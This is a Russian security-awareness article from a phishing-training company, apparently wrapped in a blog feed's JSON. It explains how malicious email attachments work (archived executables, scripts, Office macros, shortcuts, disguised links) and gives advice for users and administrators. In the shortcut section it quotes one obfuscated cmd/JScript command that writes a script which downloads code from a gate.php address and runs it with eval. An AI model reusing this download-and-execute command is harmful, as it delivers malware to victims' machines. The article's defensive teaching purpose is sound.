![](\"\/pictures\/svoldokhin_new.jpg\")
\r\nСергей Волдохин
\r\nsv@antiphish.ru<\/a>\r\n<\/p>\n
«Традиционный» вредоносный файл<\/h2>\n
Вирус или троянскую программу пользователи обычно представляют как исполняемый файл с расширением .ехе под Виндовс или .dmg под Мак.<\/p>\n
Такая вредоносная программа, приложенная к письму, может не определяться антивирусом, но почти все почтовые серверы умеют фильтровать подобные вложения: письмо с .ехе-файлом просто не будет отправлено. Чтобы обойти это ограничение, мошенникам бывает достаточно упаковать исполняемый файл в архив:
\n![](\"\/pictures\/wurde.JPG\")
\n![](\"\/pictures\/jack-exe.PNG\")
<\/p>\n
Что делать пользователю:<\/b> получив любое вложение в архиве, распакуйте его в отдельную папку и проверьте тип вложенного файла. Не открывайте файлы типа Приложение<\/i>, даже если ваш антивирус не против.<\/p>\n
Администратору.<\/b> Постарайтесь ограничить прием почты с исполняемыми файлами, даже если они упакованы в архив. При настройке ограничений стоит ориентироваться на формат файла<\/a>, а не его расширение.<\/p>\n Кроме традиционных программ, операционная система Виндоус умеет выполнять так называемые скрипты — программы, написанные на специальном языке программирования, например JScript или WBScript.<\/p>\n У таких языков есть ряд ограничений, но написанная на них вредоносная программа вполне способна зашифровать все файлы на диске или скачать полноценного троянца.<\/p>\n О существовании скриптов знает еще меньше пользователей, а мошенники стараются скрыть настоящий тип файла: например, через длинное или вызывающее доверие название: Пользователю:<\/b> Не открывайте файл, тип которого содержит слова «скрипт», «сценарий» или что-то непонятное. И даже если ваш антивирус не имеет ничего против.<\/p>\n Администратору:<\/b> постарайтесь заблокировать исполнение скриптов, или хотя бы переопределить их обработчики. Файл .js, для которого обработчиком назначен notepad.exe — неплохая помощь антивирусу и защита для невнимательных пользователей.<\/p>\n Пользователям бывает сложно поверить, но файлы Ворд или Эксель тоже могут быть вредоносными. Наиболее популярная схема — вредоносная программа запускается через макрос, который пользователю предлагается разрешить к выполнению под разумным предлогом. Например, если содержимое документа некорректно отображается:<\/p>\n Пользователю:<\/b> не разрешайте выполнение макросов в документах, которые вам присылают по электронной почте. Особенно если не знаете отправителя и не уверены в содержании макроса.<\/p>\n Администратору:<\/b> по возможности отключите исполнение макросов на компьютерах пользователей. Те, кому это действительно необходимо для работы, дадут вам знать. Вовремя обновляйте все офисные программы — кроме макросов, вредоносная программа может выполниться через эксплойт к одной из многих публичных RCE-уязвимостей<\/a>.<\/p>\n Иногда во вложении вовсе может не быть вредоносной программы. Вместо нее мошенники присылают ярлык, перейдя по которому пользователь сам загрузит и запустит вредоносную программу:<\/p>\n В свойствах этого ярлыка прописана команда, которая загрузит и запустит вредоносный .js-скрипт из интернета. Все, что нужно для загрузки и запуска, уже содержится в операционной системе.<\/p>\n Пользователю:<\/b> ярлыки, которым вы можете доверять, находятся на вашем рабочем столе. Не стоит запускать файл с типом Ярлык<\/i>, который вам прислали по электронной почте. Даже если его название вызывает доверие.<\/p>\n Администратору:<\/b> постарайтесь заблокировать исполнение любого командного интрпретатора под учетной записью пользователя. По возможности переопределите его имя и путь — вредоносным программам будет сложнее сориентироваться. Обратите внимание на полное содержимое вредоносного ярлыка:<\/p>\n Иногда мошенники не рискуют высылать вложенный файл, а вместо этого добавляют в письмо вредоносную ссылку. Благодаря оформлению, такая ссылка выглядит похожей на «безопасный» вложенный файл:<\/p>\n Обе ссылки около «заявки» ведут на вредоносный файл.<\/p>\n Пользователю:<\/b> умейте отличать вложенный файл от ссылки, которая ведет на внешний сайт. Наведите курсор и посмотрите, куда на самом деле ведет «ссылка на документ».<\/p>\n Администратору:<\/b> постарайтесь ограничить загрузку исполняемых файлов на прокси-сервере. Аналогично вложениям, ориентируйтесь на тип файла, а не расширение.<\/p>\n О компании «Антифишинг»<\/b><\/p>\n Мы помогаем обучить сотрудников и контролируем их навыки с помощью учебных фишинговых атак. Используем реалистичные сценарии и актуальные примеры мошеннических писем — в том числе те, которые описаны в статье.<\/p>\n Чтобы проверить своих пользователей, отправьте запрос через наш сайт<\/a> или напишите нам: ask@antiphish.ru<\/a><\/p>\n<\/div>",
"date_published": "2016-09-12T01:57:03+03:00",
"date_modified": "2020-10-26T17:01:29+03:00",
"_date_published_rfc2822": "Mon, 12 Sep 2016 01:57:03 +0300",
"_rss_guid_is_permalink": "false",
"_rss_guid": "3",
"_e2_data": {
"is_favourite": false,
"links_required": [
"system\/library\/highlight\/highlight.js",
"system\/library\/highlight\/highlight.css"
],
"og_images": []
}
}
],
"_e2_version": 3820,
"_e2_ua_string": "E2 (v3820; Aegea)"
}Вредоносный скрипт<\/h2>\n
\n![](\"\/pictures\/meeting-wsf.PNG\")
\n![](\"\/pictures\/scan-js.PNG\")
\n![](\"\/pictures\/sct.PNG\")
\nИсточник<\/a><\/i><\/p>\nОфисный документ<\/h2>\n
![](\"\/pictures\/locky-macros-6401.png\")
\nИсточник<\/a><\/i><\/p>\nОпасный ярлык<\/h2>\n
![](\"\/pictures\/schet.PNG\")
\n![](\"\/pictures\/attached.PNG\")
\n![](\"\/pictures\/link-properties.PNG\")
<\/p>\n%windir%\\system32\\cmd.exe \/c REM.>3.txt&echo var ty= new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");ty["\\x6F\\x70\\x65\\x6E"]("\\x47\\x45\\x54","http:\/\/<url>.com\/src\/gate.php?a");ty["\\x73\\x65\\x6E\\x64"]();eval(ty["responseText"]);>3.txt&ren 3.txt 3.js&3.js<\/code><\/pre>Вредоносная ссылка<\/h2>\n
![\"\"](\"\/pictures\/zakaz.PNG\")
<\/p>\n![\"\"](\"\/pictures\/url.png\")
<\/p>\nВыводы<\/h2>\n
\n